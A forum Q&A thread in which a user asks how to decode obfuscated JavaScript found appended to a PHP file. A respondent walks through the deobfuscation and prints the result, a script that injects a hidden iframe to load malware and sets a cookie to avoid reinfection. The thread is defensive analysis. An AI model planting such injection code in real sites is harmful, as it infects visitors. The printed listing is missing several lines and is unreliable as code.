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How would you reverse engineer this?

I've got some code that was at the bottom of a php file that is in javascript. It goes through lots of weird contortions like converting hex to ascii then doing regex replacements, executing code and so on...

Is there any way to find out what it's executing before it actually does it?

The code is here:


  • You can just go through it stage by stage - since it's Javascript, and it's interpreted, it needs to be its own decryptor. If you have access to a command-line Javascript interpreter (such as the Console in Firebug), this will be fairly straightforward.

    I'll have a look and see what comes up.

    Edit I've got through most of it - it seems like the final step is non-trivial, probably because it involves "argument.callee". Anyway I've put up what I have so far on Pastebin.

    Interestingly I found the hardest part of this was giving the gibberish variables proper names. It reminded me of a crossword, or sudoku, where you know how things are related, but you can't definitively assign something until you work out what its dependant parts are. :-) I'm sure that if someone recognises the algorithm they can give the parts more meaningful names, but at the bit where there's a lot of XORing going on, there are two temporary variables that I've just left as their default names since I don't know enough context to give them useful ones.

    Final edit: The 'arguments.callee' bit became easy when I realised I could just pass in the raw text that I'd ironically just been decoding (it's quite a clever technique, so that normal deobfuscation won't work because of course once you rename the variables, etc, the value is different). Anyway, here's your script in full:

        function EvilInstaller(){};
        EvilInstaller.prototype = {
            getFrameURL : function() {
                return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + + this.path;
            setCookie : function(name, value) {
                var d= new Date();
                d.setTime(new Date().getTime() + 86400000);
                document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString();
            install : function() {
                if (!this.alreadyInstalled()) {
                    var s = "<div style='display:none'><iframe src='" + this.getFrameURL() + "'></iframe></div>"
                    try {
                    catch(e) {
                        document.write("<html><body>" + s + "</body></html>")
                    this.setCookie(this.cookieName, this.cookieValue);
            getRandString : function() {
                var l=16,c='0Z1&2Q3Z4*5&6Z7Q8*9)a*b*cQdZeQf*'.replace(/[ZQ&\*\)]/g, '');
                var o='';
                for (var i=0;i<l;i++) {
                return o;
            alreadyInstalled : function() {
                return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
        var evil=new EvilInstaller();

    Basically it looks like it loads malware from The site is already suspected by the ISP though, so no telling what was actually there above and beyond general badness.

    (If anyone's interested, I was using Pastebin as a pseudo-VCS for the changing versions of the code, so you can see another intermediate step, a little after my first edit post. It was quite intriguing seeing the different layers of obfuscation and how they changed.)